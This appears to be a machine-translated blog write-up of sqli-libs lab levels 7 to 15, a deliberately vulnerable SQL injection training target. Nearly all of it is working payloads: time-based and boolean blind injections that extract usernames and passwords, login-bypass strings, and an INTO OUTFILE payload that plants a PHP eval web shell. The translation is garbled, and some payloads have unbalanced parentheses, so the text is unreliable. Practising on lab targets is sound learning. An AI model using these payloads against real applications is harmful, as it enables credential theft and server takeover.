"20171030 early" sqli-libs less7-15 Practice

North Wind roll ground white grass fold, Hu Tian August namely snow. Today the temperature is really low, the brain also sober a lot, in the morning after re-designated the plan, the tension is more smooth. Below begins the old black sqli-libs through the experience!!

Less 7:

Analysis: Look at what is displayed, guess what should be injected into the file

TRY:

S1: Test closed condition, 1 ' fail,1 "fail,1 ') fail,1") fail,1 ') ok! Want to ask how to test whether closed? Many methods, such as the following test procedure

s1.1 http://192.168.162.135/sqli-libs/Less-7?id=1 ') Order by 1--+, which is used to determine the number of fields, is shown here, and then

The order by in the s1.1 URL is incremented to 4 with an error, the Proof table has three fields, and the injected order by 4 statement is OK, so the description ') can close the previous content.

S2: The page does not echo, so you can use the time injection method, simply said in the structure of the injected statement to add if (Expr1, EXPR2, EXPR3), Expr2 added sleep () to delay the webpage response time, expr1 write to the database information speculation statement, so guess the right, The webpage responds slowly, guesses the mistake, the immediate response, passes the time the length, represents the true and false.

Not much detail, answer: Http://192.168.162.135/sqli-libs/Less-7?id=1 ')) and if ((ASCII (substr (select Group_concat (id,0x7c, Username,0x7c,password) from Security.users where id=10), (bis)) =97, Sleep (5), NULL)--+

Explanation: 97 is the ASCII value of a, if the 4th character is not a, of course, the beginning will not know what is the old black with? Instead of the character, the first combination of two methods to shorten the range, the final positioning,

1.? < 127 =? < =? < =? <? < 104 =? <? < 98 = =97

S3: But the old black began to say that the use of files, yes, many of the online answer is so, I also learned a bit, the implementation process is as follows:

s3.1: Determine if there is write permission, can judge write permission

Http://192.168.162.135/sqli-libs/Less-7?id=1 ') and (select COUNT (*) from Mysql.user) >0--+//Read and Write permission if returned as normal

s3.2: Writing injected content to a file

Http://192.168.162.135/sqli-libs/Less-7?id=1 ')) union Select 1, ' <?php eval ($_post["123"]);?> ', 3 into outfile '/ Var/www/html/sqli-libs/test.php '--+

Supposedly, should be in the system/var/www/html/sqli-libs under the test.php file, unfortunately, my Ubuntu did not, unfortunately, no success, do not know that you have succeeded? If someone knows the old black which wrote wrong, also please point out, thank you, hehe hehe!

Less 8:

Boolean guess table, id=1 ' to be closed

Answer: Http://192.168.162.135/sqli-libs/Less-8?id=1 ' and (ASCII (substr ((select Group_concat (id,0x7c,username,0x7c, Password) from security.users where id=10))) =97--+ Boolean-Judging character ascii, dichotomy fast

Less 9:

Time and length guess table, id=1 ' to be closed

Answer: Http://192.168.162.135/sqli-libs/Less-9?id=1 ' and if ((ASCII (substr ((select Group_concat (id,0x7c,username,0x7c, Password) from security.users where id=10)) =97, Sleep (5), null)--+ time judgment, page reaction time is replaced by Boolean

Less 10:

As with less 9.

Answer: Http://192.168.162.135/sqli-libs/Less-10?id=1 "and if ((ASCII (substr ((select Group_concat (id,0x7c,username,0x7c , password) from security.users where id=10)) =97, Sleep (5), NULL)--+

Less 11:

Unlike before, take a look at the picture.

Enter the username and password login system, this can also be SQL injection, the same is to find a closed way, try, know ' can be closed

Answer:

Login: username=a && password=b ' or ' 1 ' = ' 1

Injection: 1 ' Union select 1,database () #: 1

Less 12:

The answer: similar to less 11

Injection: 1 ' Union select 1,database () #: 1

Less 13:

Login: A:b ') or 1=1

Inject: A:b ') or (ASCII (substr (select Group_concat (Id,0x7c,username,0x7c,password) from security.users where id=10)) ) =97# (Boolean injection)

Less 14:
Login: a:b "or 1=1#

Injected: A:b "or (ASCII (substr ((select Group_concat (Id,0x7c,username,0x7c,password) from security.users where id=10))) =97# (Boolean injection)

Less 15:
Login: A:b ' or 1=1#

Injected: A:b ' or (ASCII (substr ((select Group_concat (Id,0x7c,username,0x7c,password) from security.users where id=10))) =97# (Boolean injection)

Summary: Basically the first to find a closed way, and then look for Echo Way (direct: page directly display, error message display, indirect: Boolean judgment, Time judgment), the final structure to collect the information you want, ok!

"20171030 early" sqli-libs less7-15 exercises